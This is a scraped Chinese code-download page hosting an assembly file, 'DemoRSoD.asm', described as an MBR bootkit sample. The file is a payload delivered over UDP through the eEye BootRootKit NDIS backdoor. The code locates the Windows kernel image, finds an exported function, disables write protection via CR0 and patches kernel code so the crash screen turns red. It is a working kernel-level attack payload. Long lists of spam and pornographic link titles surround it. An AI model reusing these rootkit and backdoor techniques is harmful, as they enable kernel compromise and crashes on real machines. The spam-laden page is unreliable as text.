亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? demrsod2.asm

?? 一個基于MBR的bootkit
?? ASM
字號: 
;===============================================================
; DemoRSoD.asm v2.0
;---------------------------------------------------------------
; Sample payload for executing through the eEye BootRootKit
; NDIS backdoor.  Designed for use as UDP packet payload data.
;
; Derek Soeder - eEye Digital Security - 08/17/2005
;===============================================================


.586p
.model tiny


;================================
CODE32 SEGMENT byte use32
;================================

ASSUME CS:nothing, DS:nothing, ES:nothing, FS:nothing, GS:nothing, SS:nothing

;---------------- eEye BootRootKit signature
;
; Padding tailored for a UDP packet with no IP options.
; The signature must appear at offset 55h within the Ethernet frame.
;

db 43 dup ('A')
db "eBR", 0EEh

;----------------

	cld

	;--- locate NTOSKRNL.EXE image base using non-optimized IDT#00h trick

	push		eax
	sidt		fword ptr [esp-2]
	pop		esi

	mov		ebx, [esi+4]				; high WORD of EBX = high WORD of interrupt gate offset
	mov		bx, [esi]				; low WORD of EBX = low WORD of offset

	mov		ecx, 00000FFFh				; ECX = 0FFFh (4KB-1)

	or		ebx, ecx
	inc		ebx					; round up to start of next 4KB page

	inc		ecx					; ECX = 1000h (4KB)

@mzloop:

	sub		ebx, ecx				; go back one 4KB page
	cmp		word ptr [ebx], 5A4Dh			; IMAGE_DOS_HEADER.e_magic == IMAGE_DOS_SIGNATURE ("MZ")
	jne		@mzloop

	mov		edx, [ebx+3Ch]				; IMAGE_DOS_HEADER.e_lfanew
	cmp		edx, ecx				; arbitrary upper-bound on RVA of PE header
	jae		@mzloop
	cmp		edx, 40h				; lower-bound of RVA of PE header is sizeof(IMAGE_DOS_HEADER)
	jb		@mzloop

	cmp		dword ptr [ebx+edx], 00004550h		; IMAGE_NT_HEADERS.Signature == IMAGE_NT_SIGNATURE ("PE\0\0")
	jne		@mzloop

	;--- search for "InbvSolidColorFill" name in export directory

	mov		edi, [ebx+edx+78h]			; EBP = RVA of export directory (making some assumptions)
	add		edi, ebx				; now EBP points to export directory 

	xor		edx, edx
	mov		esi, [edi+20h]				; IMAGE_EXPORT_DIRECTORY.AddressOfNames (RVA)
	add		esi, ebx				; now ESI points to start of name RVA list

	; EBX = image base address of NTOSKRNL.EXE
	; EDX = index
	; ESI = pointer into export name list
	; EDI = pointer to NTOSKRNL export directory

@nameloop:

	inc		edx					; advance index (index is 0-based; we'll need to subtract later)

	lodsd							; EAX = RVA of export name string

	cmp		dword ptr [ebx+eax], 76626E49h		; Inbv...............
	jne		@nameloop
	cmp		dword ptr [ebx+eax+4], 696C6F53h	; ....Soli...........
	jne		@nameloop

	;--- calculate InbvSolidColorFill function pointer

	mov		esi, [edi+24h]				; IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals
	add		esi, ebx				; now ESI points to name ordinals list

	movzx		edx, word ptr [esi+edx*2-2]		; get "ordinal" corresponding to index of export name

	mov		esi, [edi+1Ch]				; IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
	add		esi, ebx				; now ESI points to function RVA list

	add		ebx, [esi+edx*4]			; EBX = pointer to InbvSolidColorFill entry point

	;--- disable all page write protection (despite whatever the Intel docs say)

	mov		eax, cr0
	and		eax, NOT 00010000h
	mov		cr0, eax

	;--- search InbvSolidColorFill for "PUSH DWORD PTR [EBP+18h]" instruction (5th argument is color)

	mov		al, 0FFh				; FFh/6: PUSH mem
	push		40h
	pop		ecx
	mov		edi, ebx

@pushloop:

	repne scasb
	jne		@pushloop_done

	cmp		word ptr [edi], 01875h			; FF 75 18    PUSH DWORD PTR [EBP+18h]
	jne		@pushloop

		; change argument in InbvSolidColorFill's call to VidSolidColorFill to always be red

	mov		byte ptr [edi-1], 90h			; 90          NOP
	mov		word ptr [edi], 016Ah			; 6A 01       PUSH 1 (red)
	jmp		@rsod

@pushloop_done:

	;--- search InbvSolidColorFill for "MOV reg32, [EBP+18h]" instruction instead

@movloop:

	inc		ebx
	cmp		byte ptr [ebx], 8Bh			; 8Bh: MOV reg, mem
	jne		@movloop

	mov		ax, [ebx+1]
	and		al, NOT 38h				; zero out RRR (register) field of ModRM postbyte
	cmp		ax, 1845h				; 8Bh/01xxx101b/18h: MOV reg, [EBP+18h]
	jne		@movloop

	mov		al, [ebx+1]
	shr		al, 3
	and		al, 7					; get value of RRR field
	add		al, 58h					; 58h..5Fh: POP EAX..EDI

	mov		word ptr [ebx], 016Ah			; 6A 01       PUSH 1 (red)
	mov		[ebx+2], al				; 5x          POP reg

	;--- cause a "blue" screen

@rsod:

	db 0C4h, 0C4h
	db "eEye"

CODE32 ENDS

END

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
欧美日韩高清一区二区| 国产精品亚洲一区二区三区妖精 | 亚洲三级久久久| 99国产精品视频免费观看| 国产精品成人午夜| 91在线视频观看| 亚洲码国产岛国毛片在线| 色一情一伦一子一伦一区| 一区二区三区免费| 国产午夜精品一区二区三区视频| 国内精品免费在线观看| 国产亚洲精品免费| 波多野结衣亚洲一区| 亚洲黄一区二区三区| 欧美日本在线播放| 久久99国产精品久久99果冻传媒| 久久精品亚洲一区二区三区浴池| www.欧美亚洲| 亚洲成a人v欧美综合天堂下载| 日韩免费一区二区| youjizz久久| 午夜视黄欧洲亚洲| 久久九九99视频| 色综合激情五月| 免费日本视频一区| 欧美激情在线看| 欧美美女bb生活片| 国产高清不卡一区二区| 亚洲激情成人在线| 26uuu久久天堂性欧美| 91女人视频在线观看| 麻豆中文一区二区| 一区视频在线播放| 88在线观看91蜜桃国自产| 粉嫩av一区二区三区粉嫩 | 日韩一区二区在线看| 国产成人自拍在线| 无码av免费一区二区三区试看| 国产日韩v精品一区二区| 91福利在线导航| 国产精品主播直播| 亚洲成人激情社区| 青椒成人免费视频| 国产精品免费看片| 日韩欧美专区在线| 一本一道综合狠狠老| 国内精品在线播放| 婷婷中文字幕一区三区| 中文字幕视频一区| 欧美精品一区二区三区视频| 欧美三级电影在线看| 成人性生交大片免费| 捆绑调教一区二区三区| 夜夜嗨av一区二区三区网页| 欧美国产丝袜视频| 欧美精品一区二区精品网| 欧美日韩二区三区| 一本色道久久综合亚洲91| 国产精品综合一区二区三区| 蜜臀91精品一区二区三区| 亚洲国产你懂的| 亚洲男人天堂av| 国产精品女同一区二区三区| 久久久精品国产免费观看同学| 91精品国产综合久久香蕉的特点| 欧洲亚洲国产日韩| 91老司机福利 在线| 成人99免费视频| 国产精品一卡二卡| 韩国一区二区在线观看| 精品一区二区三区免费| 日本va欧美va精品| 日韩国产欧美在线播放| 亚洲成a人v欧美综合天堂下载| 一区二区三区欧美| 亚洲在线视频免费观看| 一区二区三区四区国产精品| 亚洲视频一二三| 亚洲精品乱码久久久久久 | 日韩精品中午字幕| 这里只有精品免费| 欧美久久久久久久久久| 欧美久久久久久久久| 欧美久久久久中文字幕| 91精品久久久久久久久99蜜臂| 欧美午夜影院一区| 欧美日韩国产三级| 这里只有精品免费| 精品国产乱码久久久久久老虎| 日韩美女一区二区三区| 久久久久久久国产精品影院| 久久精品亚洲乱码伦伦中文| 国产精品理论片| 亚洲欧美激情插| 午夜电影久久久| 美日韩一区二区| 国产成人精品综合在线观看| 99re视频精品| 欧美日韩国产成人在线免费| 日韩欧美一卡二卡| 国产午夜精品一区二区三区视频| 久久精品国产久精国产| 国产精品资源站在线| 91美女精品福利| 欧美剧情片在线观看| 精品久久久久久亚洲综合网| 欧美激情一区二区| 亚洲国产美女搞黄色| 日本三级亚洲精品| 国产成人免费av在线| 91国偷自产一区二区三区成为亚洲经典 | 欧美日韩国产高清一区二区| 日韩欧美专区在线| 欧美激情在线免费观看| 亚洲永久精品大片| 精品一区二区免费看| 99久精品国产| 91精品国产美女浴室洗澡无遮挡| 国产亚洲美州欧州综合国| 夜夜夜精品看看| 国内成+人亚洲+欧美+综合在线| av动漫一区二区| 欧美一级日韩免费不卡| 中文字幕av一区二区三区| 五月天精品一区二区三区| 成人视屏免费看| 在线成人免费视频| 国产精品久久久久久久久免费丝袜 | 成人深夜福利app| 日本福利一区二区| 久久亚洲综合av| 亚洲成人av一区二区三区| 国产成人8x视频一区二区 | 亚洲成人免费在线观看| 国产尤物一区二区| 欧洲精品一区二区| 国产性天天综合网| 日本人妖一区二区| 91国产视频在线观看| 久久久久久久久97黄色工厂| 午夜精品久久一牛影视| k8久久久一区二区三区| 精品国产91乱码一区二区三区| 亚洲在线观看免费| 99免费精品视频| 久久精品欧美一区二区三区不卡| 亚洲成a人片综合在线| 色婷婷国产精品| 国产视频一区二区三区在线观看| 日本女优在线视频一区二区| 在线观看亚洲专区| 亚洲天堂2014| 成人国产精品免费观看视频| 精品成a人在线观看| 蜜臀91精品一区二区三区| 欧美精品在线一区二区| 亚洲国产视频网站| 色视频一区二区| 综合网在线视频| 不卡一区中文字幕| 国产精品嫩草影院com| 国产成人综合视频| 国产日韩成人精品| 高清日韩电视剧大全免费| 久久久久久99久久久精品网站| 久久精品国产亚洲5555| 日韩视频免费直播| 蜜桃精品视频在线观看| 欧美一级视频精品观看| 免费av成人在线| 日韩视频免费直播| 久久国产精品区| 久久亚洲综合av| 国产91露脸合集magnet| 中文在线一区二区| 99综合电影在线视频| 最新热久久免费视频| 一本大道久久a久久综合| 亚洲精品精品亚洲| 欧美日韩一二三| 琪琪久久久久日韩精品| 日韩精品在线网站| 国产精品一区二区三区网站| 国产欧美一区二区精品忘忧草 | 日本中文字幕一区二区有限公司| 制服丝袜亚洲网站| 韩国精品久久久| 国产精品视频看| 在线亚洲一区观看| 日韩高清欧美激情| 久久这里只有精品6| 不卡av电影在线播放| 一区二区三区四区激情| 欧美高清性hdvideosex| 欧美影院精品一区| 日本欧美一区二区| 久久久噜噜噜久久中文字幕色伊伊| 国产**成人网毛片九色| 亚洲综合色成人| 欧美成人vps|